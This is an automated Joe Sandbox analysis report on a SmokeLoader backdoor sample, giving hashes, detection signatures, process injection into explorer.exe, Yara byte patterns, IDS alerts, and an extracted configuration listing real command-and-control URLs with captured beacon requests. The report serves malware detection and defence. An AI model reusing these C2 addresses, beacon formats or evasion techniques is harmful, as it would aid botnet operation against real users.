Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kGSZ4dCqYh.exe

Overview

General Information

Sample name:kGSZ4dCqYh.exe
renamed because original name is a hash value
Original sample name:bab1912f10355b913050217669acc322.exe
Analysis ID:1541371
MD5:bab1912f10355b913050217669acc322
SHA1:17848e8aa5e443c06d495c500e642be0967cabe6
SHA256:38dc7521a2e99fb4c095f74b51dadf8b10fdf680ecbcecb419e6720e8151096d
Tags:exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • kGSZ4dCqYh.exe (PID: 6752 cmdline: "C:\Users\user\Desktop\kGSZ4dCqYh.exe" MD5: BAB1912F10355B913050217669ACC322)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • dvjdfvr (PID: 5164 cmdline: C:\Users\user\AppData\Roaming\dvjdfvr MD5: BAB1912F10355B913050217669ACC322)
  • dvjdfvr (PID: 1404 cmdline: C:\Users\user\AppData\Roaming\dvjdfvr MD5: BAB1912F10355B913050217669ACC322)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://tnc-corp.ru/tmp/index.php", "http://volisc.biz/tmp/index.php", "http://livbev.online/tmp/index.php", "http://liverds.at/tmp/index.php"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2090478524.0000000000550000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1862957209.0000000000620000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1862980152.0000000000630000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000000.00000002.1862980152.0000000000630000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000000.00000002.1863029600.0000000000651000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      Click to see the 7 entries

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Execution of Suspicious File Type Extension
      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\dvjdfvr, CommandLine: C:\Users\user\AppData\Roaming\dvjdfvr, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\dvjdfvr, NewProcessName: C:\Users\user\AppData\Roaming\dvjdfvr, OriginalFileName: C:\Users\user\AppData\Roaming\dvjdfvr, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\dvjdfvr, ProcessId: 5164, ProcessName: dvjdfvr

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-24T18:37:39.640493+020020391031A Network Trojan was detected192.168.2.449736189.164.127.21780TCP
      2024-10-24T18:38:58.525736+020020391031A Network Trojan was detected192.168.2.450003189.164.127.21780TCP
      2024-10-24T18:39:12.106292+020020391031A Network Trojan was detected192.168.2.450004189.164.127.21780TCP
      2024-10-24T18:39:31.867272+020020391031A Network Trojan was detected192.168.2.453258189.164.127.21780TCP
      2024-10-24T18:39:51.793152+020020391031A Network Trojan was detected192.168.2.458682189.164.127.21780TCP
      2024-10-24T18:40:12.354239+020020391031A Network Trojan was detected192.168.2.458683201.124.145.19680TCP
      2024-10-24T18:40:27.315155+020020391031A Network Trojan was detected192.168.2.458684201.124.145.19680TCP
      2024-10-24T18:40:45.531760+020020391031A Network Trojan was detected192.168.2.458685201.124.145.19680TCP
      2024-10-24T18:41:03.377372+020020391031A Network Trojan was detected192.168.2.458686201.124.145.19680TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: kGSZ4dCqYh.exeAvira: detected
      Antivirus detection for dropped file
      Source: C:\Users\user\AppData\Roaming\dvjdfvrAvira: detection malicious, Label: HEUR/AGEN.1306978
      Found malware configuration
      Source: 00000000.00000002.1862980152.0000000000630000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://tnc-corp.ru/tmp/index.php", "http://volisc.biz/tmp/index.php", "http://livbev.online/tmp/index.php", "http://liverds.at/tmp/index.php"]}
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Roaming\dvjdfvrReversingLabs: Detection: 39%
      Multi AV Scanner detection for submitted file
      Source: kGSZ4dCqYh.exeReversingLabs: Detection: 39%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Machine Learning detection for dropped file
      Source: C:\Users\user\AppData\Roaming\dvjdfvrJoe Sandbox ML: detected
      Machine Learning detection for sample
      Source: kGSZ4dCqYh.exeJoe Sandbox ML: detected
      Source: kGSZ4dCqYh.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\dvjdfvrCode function: 7_2_00402780 InterlockedIncrement,SetFileAttributesA,GetCommConfig,GetNumberFormatW,GetLogicalDriveStringsW,VerifyVersionInfoW,GetComputerNameW,ClearCommBreak,InterlockedIncrement,EnumTimeFormatsW,GetTempFileNameW,_memset,CommConfigDialogW,ReadConsoleInputA,GetVersionExW,InterlockedIncrement,SetVolumeMountPointW,GlobalMemoryStatus,7_2_00402780

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 189.164.127.217:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50004 -> 189.164.127.217:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:58685 -> 201.124.145.196:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:58682 -> 189.164.127.217:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:58684 -> 201.124.145.196:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:53258 -> 189.164.127.217:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50003 -> 189.164.127.217:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:58686 -> 201.124.145.196:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:58683 -> 201.124.145.196:80
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 201.124.145.196 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 189.164.127.217 80Jump to behavior
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: http://tnc-corp.ru/tmp/index.php
      Source: Malware configuration extractorURLs: http://volisc.biz/tmp/index.php
      Source: Malware configuration extractorURLs: http://livbev.online/tmp/index.php
      Source: Malware configuration extractorURLs: http://liverds.at/tmp/index.php
      Source: Joe Sandbox ViewASN Name: UninetSAdeCVMX UninetSAdeCVMX
      Source: Joe Sandbox ViewASN Name: UninetSAdeCVMX UninetSAdeCVMX
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tkmyedfqjdrh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: tnc-corp.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kvrakpmwnkdw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: tnc-corp.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://krorrwetybapxgs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: tnc-corp.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nhvxjbuepegldhgi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: tnc-corp.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fhnrrbktckg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: tnc-corp.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gucrgvicowjmruy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: tnc-corp.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gdvvxgrxcdrf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: tnc-corp.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iiqfsjirxhqu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: tnc-corp.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lqjnthfwecsdh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: tnc-corp.ru
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: tnc-corp.ru
      Source: global trafficDNS traffic detected: DNS query: volisc.biz
      Source: global trafficDNS traffic detected: DNS query: livbev.online
      Source: global trafficDNS traffic detected: DNS query: liverds.at
      Source: unknownHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tkmyedfqjdrh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: tnc-corp.ru
      Source: explorer.exe, 00000001.00000000.1843808640.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1845367065.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: explorer.exe, 00000001.00000000.1843808640.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1845367065.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: explorer.exe, 00000001.00000000.1843808640.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1845367065.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: explorer.exe, 00000001.00000000.1843808640.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1845367065.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: explorer.exe, 00000001.00000000.1843808640.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
      Source: explorer.exe, 00000001.00000000.1845946637.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1844459297.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1845010581.0000000008720000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: explorer.exe, 00000001.00000000.1847015156.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: explorer.exe, 00000001.00000000.1847015156.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
      Source: explorer.exe, 00000001.00000000.1843808640.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
      Source: explorer.exe, 00000001.00000000.1843808640.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
      Source: explorer.exe, 00000001.00000000.1847015156.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000001.00000000.1845367065.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 00000001.00000000.1845367065.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
      Source: explorer.exe, 00000001.00000000.1842655910.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1843124662.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 00000001.00000000.1845367065.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
      Source: explorer.exe, 00000001.00000000.1845367065.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
      Source: explorer.exe, 00000001.00000000.1845367065.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
      Source: explorer.exe, 00000001.00000000.1843808640.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
      Source: explorer.exe, 00000001.00000000.1843808640.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
      Source: explorer.exe, 00000001.00000000.1847015156.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
      Source: explorer.exe, 00000001.00000000.1843808640.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
      Source: explorer.exe, 00000001.00000000.1847015156.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
      Source: explorer.exe, 00000001.00000000.1847015156.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
      Source: explorer.exe, 00000001.00000000.1847015156.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
      Source: explorer.exe, 00000001.00000000.1847015156.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
      Source: explorer.exe, 00000001.00000000.1843808640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
      Source: explorer.exe, 00000001.00000000.1843808640.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
